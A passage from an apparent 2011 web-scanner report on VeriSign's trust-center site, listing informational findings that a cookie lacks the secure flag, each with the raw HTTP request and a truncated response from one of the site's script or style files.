Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 28368
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var OnlineOpinion=new Ob
...[SNIP]...

6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/popup.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 598
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(
...[SNIP]...

6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ
...[SNIP]...

6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5155
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle
...[SNIP]...

6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/script_log.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1408
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}}
function generateCall(level,message){var url='
...[SNIP]...

6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:25 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 89269
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
   Copyright (c) 2004-2009, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

/*
   
...[SNIP]...

6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/syscheck.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1470
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var oVal;var sessionTimerId=0;var SESSIONTIMEOUT=33*60*1000;function checkStatus(val){if(oVal!=val){window.location.reload();}}
function callServer(check,orig){var localHttpObj=getXMLHttpObj();oVal=o
...[SNIP]...

6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDK.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 57905
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

if(TeaLeaf&&TeaLeaf.Configuration&&TeaLeaf.Configuration.tlinit==false){TeaLeaf.Configuration.tlinit=true;if(!Array.prototype.push){Array.prototype.stackEnd=0;Array.prototype.push=function(a){this[thi
...[SNIP]...

6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:33 GMT
Server: Apache
Set-Cookie: TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 22968
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
* Copyright . 1999-2009 TeaLeaf Technology, Inc.
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY TEALEAF ``AS IS''

...[SNIP]...

6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_capture_payment.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4605
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function onPaymentMethodChange(){var paymentMethodObj=getElement("enrollment.payment.paymentMethod");if(paymentMethodObj!==null){var radioLength=paymentMethodObj.length;var index=0;for(var i=0;i<radi
...[SNIP]...

6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/trustcenter_product_selector.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 19769
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var premiumSupportFee=0;var pciComplianceFee=0;var pricingMatrix=[];var validityObjFive=null;var validityObjFour=null;var validityObjThree=null;var validityObjTwo=null;var validityObjOne=null;var pro
...[SNIP]...

6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/utility.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8013
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var menuItemCurrentlyHasFocus=false;function MM_findObj(n,d){var p,i,x;if(!d){d=document;}
if((p=n.indexOf("?"))>0&&parent.frames.length){d=parent.frames[n.substring(p+1)].document;n=n.substring(0,p)
...[SNIP]...

6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/style/brand.css HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
